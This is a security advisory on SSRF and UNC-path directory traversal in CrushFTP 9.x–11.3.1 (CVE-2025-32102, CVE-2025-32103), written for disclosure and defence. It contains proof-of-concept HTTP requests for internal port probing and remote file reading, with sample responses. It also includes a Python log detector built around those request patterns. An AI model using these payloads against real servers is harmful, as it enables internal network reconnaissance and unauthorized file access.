# CVE-2025-32102 & CVE-2025-32103: SSRF and Directory Traversal in CrushFTP
**Author:** Rafael Pedrero
**Published:** April 4, 2025
**Source:** [Full Disclosure Mailing List](https://seclists.org/fulldisclosure/2025/Apr/17)
---
## Overview
Two critical vulnerabilities have been identified in CrushFTP versions 9.x through 11.3.1:
- **CVE-2025-32102**: Server-Side Request Forgery (SSRF)
- **CVE-2025-32103**: Directory Traversal via SMB UNC paths
These flaws allow attackers to perform unauthorized internal network scans and access sensitive files, posing significant security risks.
---
## Vulnerability Details
### CVE-2025-32102: Server-Side Request Forgery (SSRF)
**Affected Versions:**
CrushFTP 9.x, 10.x through 10.8.4, and 11.x through 11.3.1
**Description:**
The `/WebInterface/function/` endpoint processes `command=telnetSocket` requests with `host` and `port` parameters. Due to inadequate validation, attackers can exploit this to initiate arbitrary connections to internal systems.
**Proof of Concept:**
```http
POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080
```
**Expected Responses:**
- Open port (e.g., 8080):
```xml
<commandResult><response><id>PeT</id><data>Connected (/127.0.0.1)</data></response></commandResult>
```
- Closed port (e.g., 8888):
```xml
<commandResult><response><error>ERROR:java.net.ConnectException: Connection refused: getsockopt: (/127.0.0.1)</error>Error:java.lang.NullPointerException</response></commandResult>
```
### CVE-2025-32103: Directory Traversal via SMB UNC Paths
**Affected Versions:**
CrushFTP 9.x, 10.x through 10.8.4, and 11.x through 11.3.1
**Description:**
The application fails to properly sanitize file path inputs, allowing attackers to traverse directories and access files via SMB UNC paths (e.g., `\\server\share`).
**Proof of Concept:**
```http
POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

command=readFile&path=\\192.168.1.100\shared\secret.txt
```
This request attempts to read `secret.txt` from a shared folder on a remote server, bypassing local file access restrictions.
## Mitigation
**Recommended Action:**
Upgrade to the latest version of CrushFTP (11.3.2 or later), where these vulnerabilities have been addressed.
**Additional Measures:**
- **Input Validation:** Ensure that all user inputs, especially those related to network addresses and file paths, are properly validated and sanitized.
- **Network Segmentation:** Restrict internal network access from the application server to prevent unauthorized connections.
- **Monitoring:** Implement logging and monitoring to detect unusual activities, such as unexpected internal network scans or file access attempts.
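As an added, defender-side example (not part of the advisory or of CrushFTP itself), the following Python script applies the Input Validation and Monitoring measures above: it parses request bodies sent to `/WebInterface/function/` and flags the two request patterns described in this advisory. The log format, the `SAMPLE_LOG` lines and the function names are constructed for illustration.

```python
import ipaddress
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Constructed sample log: "<client_ip> <request_path> <urlencoded_body>" per line.
SAMPLE_LOG = """\
10.0.0.5 /WebInterface/function/ command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080
10.0.0.5 /WebInterface/function/ command=telnetSocket&sub_command=connect&host=10.0.0.12&port=22
10.0.0.7 /WebInterface/function/ command=readFile&path=%5C%5C192.168.1.100%5Cshared%5Csecret.txt
10.0.0.9 /WebInterface/function/ command=getUserList
10.0.0.9 /WebInterface/function/ command=readFile&path=docs%2Freport.pdf
"""

def is_internal_host(host: str) -> bool:
    """True for loopback, private, link-local or unspecified targets.
    Non-literal hostnames resolve on the server, so they are flagged too."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True
    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_unspecified

def is_unc_or_traversal(path: str) -> bool:
    """Flag SMB UNC paths (\\\\server\\share, //server/share) and '..' segments."""
    normalized = path.replace("\\", "/")
    return normalized.startswith("//") or ".." in normalized.split("/")

def classify(body: str) -> Optional[str]:
    """Return the CVE a request body matches, or None when it looks benign."""
    params = {k: v[0] for k, v in parse_qs(body).items()}
    cmd = params.get("command", "")
    if cmd == "telnetSocket" and params.get("sub_command") == "connect":
        if is_internal_host(params.get("host", "")):
            return "CVE-2025-32102"
    if cmd == "readFile" and is_unc_or_traversal(params.get("path", "")):
        return "CVE-2025-32103"
    return None

def scan_log(log: str) -> List[Tuple[str, str]]:
    """Return (client_ip, cve) for every log line that matches a pattern."""
    hits = []
    for line in log.splitlines():
        client, _path, body = line.split(" ", 2)
        cve = classify(body)
        if cve:
            hits.append((client, cve))
    return hits
```

The same `is_internal_host` and `is_unc_or_traversal` checks can be placed in front of the `host` and `path` parameters as an allow-list gate rather than only as a log detector.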
## About the Author
Rafael Pedrero is a cybersecurity researcher specializing in web application vulnerabilities. His contributions to the security community include the discovery and responsible disclosure of critical flaws in widely used software applications.
Stay informed and ensure your systems are up-to-date to protect against these vulnerabilities.